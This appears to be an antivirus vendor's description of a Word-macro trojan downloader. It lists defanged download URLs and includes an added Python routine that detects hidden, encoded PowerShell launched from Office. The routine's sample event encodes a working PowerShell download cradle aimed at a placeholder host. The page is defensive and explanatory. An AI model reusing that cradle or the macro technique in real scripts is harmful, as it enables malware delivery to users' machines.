VBA/Agent.IP!tr.dldr
Analysis
VBA/Agent.IP!tr.dldr is a generic detection for a trojan.
Since this is a generic detection, malware detected as VBA/Agent.IP!tr.dldr may exhibit varying behaviour.
Below are some of its observed characteristics/behaviours:
- It is a Microsoft Word macro.
- It uses VBA to build a base64-encoded PowerShell command and executes it with a hidden window.
- It employs a large amount of string manipulation to obfuscate the code.
- The PowerShell script attempts to connect to multiple sites to download a file named 857.exe.
- At the time this virus description was written (Jan. 14, 2020), the sites the malware connects to no longer supplied the executable.
- The malware attempts to connect to the following sites to download the executable:
- hxxps://www.the36th[REMOVED].com/og/rpTZZdQ/
- hxxps://travel[REMOVED]dmc.com/wp-content/wCEvisiZ/
- hxxp://cause[REMOVED]life.org/wp-content/plugins/p12-d5zgmuvbcp-033/
- hxxps://adanz[REMOVED]api.com/giqn/8oz-hj46asp-799/
- hxxps://dapper[REMOVED].xyz/calendar/DbdSQsr/
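As an added example (not Fortinet's code), the detection logic a defender could run over process-creation telemetry to catch the chain described above: an Office parent launching a hidden, base64-encoded PowerShell command whose decoded script fetches an executable. The event records, the placeholder URL and the function names are constructed for this example.

```python
import base64
import re
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

def _flag_value(tokens, name):
    """Value after a PowerShell switch; any unambiguous abbreviation (-e, -enc, -EncodedCommand) matches."""
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) > 1 and tok.startswith("-") and name.startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None

def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    blob = _flag_value(cmdline.split(), "encodedcommand")
    if blob is None:
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess(parent_image, cmdline):
    """Score one process-creation event for the pattern on this page: Office parent,
    hidden PowerShell window, encoded command, and a URL plus .exe in the decoded script."""
    tokens = cmdline.split()
    image = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    reasons, urls = [], []
    if image in ("powershell.exe", "pwsh.exe", "powershell"):
        if parent_image.lower() in OFFICE_PARENTS:
            reasons.append("office-parent")
        if (_flag_value(tokens, "windowstyle") or "").lower() == "hidden":
            reasons.append("hidden-window")
        script = decode_encoded_command(cmdline)
        if script is not None:
            reasons.append("encoded-command")
            urls = URL_RE.findall(script)
            if urls and re.search(r"\.exe\b", script, re.IGNORECASE):
                reasons.append("exe-download")
    suspicious = "office-parent" in reasons and "encoded-command" in reasons
    return {"suspicious": suspicious, "reasons": reasons, "urls": urls}

# Constructed sample events (parent image, command line). The URL is a placeholder, not one from the page.
MALICIOUS_SCRIPT = "(New-Object Net.WebClient).DownloadFile('https://example.invalid/x/','857.exe')"
SAMPLE_EVENTS = [
    ("WINWORD.EXE", "powershell.exe -NoP -w hidden -enc "
     + base64.b64encode(MALICIOUS_SCRIPT.encode("utf-16-le")).decode("ascii")),
    ("explorer.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]
```

The decoded script is returned alongside the reasons so an analyst can pull the contacted URLs straight from the event rather than from a sandbox run.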
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Version Updates
Date | Version | Detail |
---|---|---|
2021-02-23 | 84.00249 | |
2020-11-24 | 82.07600 | Sig Updated |
2020-10-13 | 81.06700 | Sig Updated |
2020-09-01 | 80.05600 | Sig Updated |
2020-03-04 | 75.71900 | Sig Updated |
2019-12-04 | 73.55900 | Sig Updated |
2019-12-02 | 73.50900 | Sig Updated |
2019-12-02 | 73.49500 | Sig Updated |
2019-12-02 | 73.49300 | Sig Updated |
2019-10-11 | 72.25800 | Sig Updated |